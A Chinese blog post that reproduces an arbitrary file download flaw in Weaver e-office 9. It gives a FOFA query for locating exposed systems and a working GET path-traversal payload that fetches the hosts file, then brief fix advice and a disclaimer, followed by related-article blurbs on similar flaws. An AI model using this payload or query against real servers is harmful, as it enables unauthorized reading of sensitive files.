任意文件下载之漏洞复现

最新推荐文章于 2023-12-25 16:15:05 发布
原创 最新推荐文章于 2023-12-25 16:15:05 发布 · 220 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

本文介绍了泛微e-office协同办公系统的安全问题,包括版本影响下的语法特征导致的漏洞,通过get请求可下载主机文件。提出了使用最新版本、限制路径访问的修复建议,强调合法安全使用的重要性。

0x01 应用介绍

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案

0x02 影响版本及语法特征

泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”

0x03 漏洞复现

payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
直接使用get请求拼接该payload即可下载目标主机hosts文件

下载完成后打开文件查看


下载服务器文件复现成功

nuclei

修复建议

使用最新版本的应用

限制漏洞路径的访问

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

最低0.47元/天 解锁文章
漏洞复现】金和OA C6 FileDownLoad.aspx 任意文件读取漏洞复现
m0_71944965的博客
12-31 245
金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
服务器解析漏洞任意文件下载
2301_81475812的博客
02-11 2287
这时候很多人肯定会说,具有root权限直接去读shadow文件了,但是很多时候我们遇到的服务器可能只对外开放了80,443端口,这时候我们即使获得了密码作用也不大,但是具备root权限对任意文件下载利用是绝好的。文件下载功能在很多web系统上都会出现,如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。在找到下载文件的的url后,将url中的文件参数,替换为各种穿越目录,看是否能下载到相应的文件,如果能下载,就有下载漏洞
任意文件下载漏洞利用分析和防御方法
白帽黑客鹏哥的博客
12-20 3388
任意文件下载漏洞是指攻击者可以通过特制的URL请求,绕过服务器的安全检查,下载服务器上任意文件。这通常是由于服务器端对用户请求的文件路径没有进行足够的过滤或验证,导致攻击者可以通过构造特殊的URL请求来访问服务器上任意文件。为了修复任意文件下载漏洞,服务器端需要对用户请求的文件路径进行严格的过滤和验证,防止攻击者通过构造特殊的URL请求来访问服务器上任意文件。一旦发现任意文件下载漏洞,就可以利用它来下载服务器上的任意文件。例如,可以通过以下步骤利用任意文件下载漏洞下载服务器上的。
java代码审计系统课程
05-06
1、随着三同步要求,代码审计作为三同步中的其中一项,再信息化安全中越来越重要。2、很多安全人员更偏向与渗透,而对代码安全知道甚少。很多开发人员更不懂安全。3、市面上少有的系统性的java代码审计课程。4、学习以后开发不再编写“漏洞”,渗透测试人员更加清晰的了解漏洞原理。5、本课程附件中提供审计源码、审计工具fortify
从代码审计的角度分析 Ruoyi v4.7.6 的任意文件下载漏洞
新青年1号
05-26 4503
从代码审计的角度看 Ruoyi v4.7.6 任意文件下载漏洞
任意文件下载漏洞概述、复现、利用、危害、修复方案
白帽子凯哥聊黑客
12-20 2818
任意文件下载是一种允许攻击者从目标服务器下载任意文件的攻击类型。这可能导致严重的安全漏洞,例如泄露敏感信息、获取对服务器的未经授权的访问,甚至完全控制服务器。
任意文件下载漏洞原理以及修复方法
it知识分享 free for nothing..
12-25 2125
任意文件下载漏洞原理以及修复方法
任意文件下载漏洞复现
weixin_46062722的博客
02-25 1228
漏洞介绍 一些网站由于业务需求,可能提供文件查看或者下载的功能,如果对用户查看或者下载的文件不做限制,那么恶意用户可以可以查看或者下载一些敏感文件,比如配置信息、源码文件等 漏洞成因: 存在读取文件的函数 读取文件的路径用户可控且未校验或校验不严格 输出了文件内容 漏洞危害: 下载服务器任意文件,如脚本代码、服务及系统配置文件等,进一步利用获取的信息进行更大的危害。 可用得到的代码进一步代码审计,得到更多可利用漏洞 实验环境:webug靶场 主页 BP抓包 我们把url的路径改为,发送至repeate
修复路径遍历或任意文件下载漏洞
laok186的博客
08-01 6507
通过过滤入参特殊符合进行路径遍历拦截
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 2万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
Web安全-任意文件下载漏洞
道阻且长,行则将至
11-18 4691
前言 任意文件下载漏洞,正常的利用手段是下载服务器文件,如脚本代码,服务器配置或者是系统配置等等。但是有的时候我们可能根本不知道网站所处的环境,以及网站的路径,这时候我们只能利用../../来逐层猜测路径,让漏洞利用变得繁琐。 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞。 ...
任意文件读取及漏洞复现
来日可期的博客
08-31 5595
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取和漏洞复现
weixin_58954236的博客
09-02 7328
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
【网络安全 --- 任意文件下载漏洞(1)】任意文件下载漏洞
m0_67844671的博客
10-24 1432
【网络安全 --- 任意文件下载漏洞(1)】任意文件下载漏洞
常见漏洞修复方案
Guoke324的博客
09-09 1万+
常见漏洞修复方案漏洞修复
代码审计——任意文件下载详解(二)
Boom!脑洞大爆炸的博客
09-20 680
代码审计——任意文件下载详解(二)
Web安全(任意文件下载)
qq_42383069的博客
07-28 4489
任意文件下载漏洞 一 . 漏洞原理 任意文件下载 , 顾名思义 , 就是可以下载网站上面的任意文件. 一些网站提供文件下载的功能,但是如果对下载的文件没有做限制,直接通过绝对路径对其文件进行下载,那么,就可以利用这种方式下载服务器的其他文件。 二 .漏洞危害 危害大概可以分为两类: 1. 下载网站源码 2. 查看网站敏感文件( 数据库账户密码,配置文件等等 ) 三 . 可能出现的参数汇总 从url中看,以下参数容易出现任意文件下载漏洞 download.php?path= download.php?file
phpcms任意文件上传漏洞复现
最新发布
09-10
复现phpcms任意文件上传漏洞可从不同场景和利用方式进行,以下是具体方法: ### 基于PHPCMS 9.6.0版本libs/classes/attachment.class.php文件漏洞漏洞源于PHPCMS程序在下载远程/本地文件时未对文件类型做正确...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值